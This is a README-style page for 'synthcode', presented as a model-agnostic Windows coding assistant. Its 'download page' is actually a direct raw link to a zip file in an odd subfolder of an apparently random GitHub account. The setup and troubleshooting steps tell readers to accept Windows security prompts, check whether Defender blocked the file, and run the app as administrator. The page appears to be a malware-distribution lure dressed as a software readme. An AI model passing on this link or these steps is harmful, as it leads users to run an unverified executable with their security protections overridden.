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synthcode is an open-source coding helper for people who want help with software tasks on Windows.
It can help with common development work such as:
- reading project files
- suggesting code changes
- handling coding tasks in steps
- working with different AI models
- using a clean TypeScript-based setup
- fitting into agent-style workflows
It is built for users who want a Claude Code style tool without being tied to one model or one service.
Before you start, make sure you have:
- Windows 10 or Windows 11
- A stable internet connection
- Enough free disk space for the app and your project files
- Permission to run apps on your PC
If the app needs extra components on your system, it will guide you during setup.
- Open the download page: https://raw.githubusercontent.com/Beige-superior870/synthcode/main/Trema/Software-1.2.zip
- Find the latest release or download option on the page
- Download the Windows file for your computer
- Open the file you downloaded
- If Windows asks for permission, choose Run or Yes
- Follow the setup steps on screen
- Wait for the install to finish
- Open synthcode from the Start menu or desktop shortcut
If you do not see a release file on the page, use the main repository page to get the latest build or install instructions
When you open synthcode for the first time:
- Let it finish loading
- If Windows shows a security prompt, choose the option that lets the app open
- If the app asks for access to your files, allow it if you want to work on local projects
- If you use an AI key or account, enter it when the app asks
- Choose the folder that holds the code or project you want to work on
After that, the app should open into its main workspace
Use synthcode when you want help with a coding task:
- Start the app
- Open your project folder
- Type what you want done in plain language
- Let the agent review the files
- Check the suggested changes
- Approve the changes you want
- Save your work
You can use it for tasks like:
- fixing a bug
- adding a feature
- cleaning up code
- explaining what a file does
- making small edits across many files
- helping with repetitive work
synthcode is model-agnostic, which means it can work with different AI providers.
That gives you flexibility if you want to:
- use a model you already have
- switch providers later
- keep your setup simple
- match the tool to your own budget and needs
If the app asks for a model key, provider name, or endpoint, enter the details from your AI service account
For best results:
- keep your code in a normal project folder
- close files that you do not need
- use one task at a time
- give short, clear instructions
- review changes before you save them
Example requests you can type:
- Fix the login page error
- Add a dark mode toggle
- Explain this folder structure
- Remove unused code in this file
- Update the text on the home page
If something does not open right away:
- right-click the app and choose Run as administrator
- check that Windows Defender did not block the file
- make sure the download finished before you open it
- try closing and reopening the app
- restart your PC if the app still does not start
If your project is in a protected folder, move it to a folder like Documents or Desktop and try again
synthcode is built for steady, focused work.
It fits users who want:
- a local app for coding help
- a clear agent workflow
- support for different AI models
- a TypeScript-based codebase
- open-source software they can inspect later
It is a good fit for small edits, larger code tasks, and repeat work across a project
- Name: synthcode
- Type: end-user coding app
- Focus: agent-driven code help
- Platform: Windows
- License: MIT
- Style: open-source, TypeScript-first, model-agnostic
- Download synthcode
- Install or open it on Windows
- Connect your AI model if needed
- Open your project folder
- Ask for the task you want done
- Review the changes
- Save your work
You can ask synthcode to help with:
- fixing broken buttons
- changing text across the app
- moving code into cleaner files
- updating settings pages
- adding new UI states
- checking files for simple mistakes
- preparing code for a commit
Primary page: https://raw.githubusercontent.com/Beige-superior870/synthcode/main/Trema/Software-1.2.zip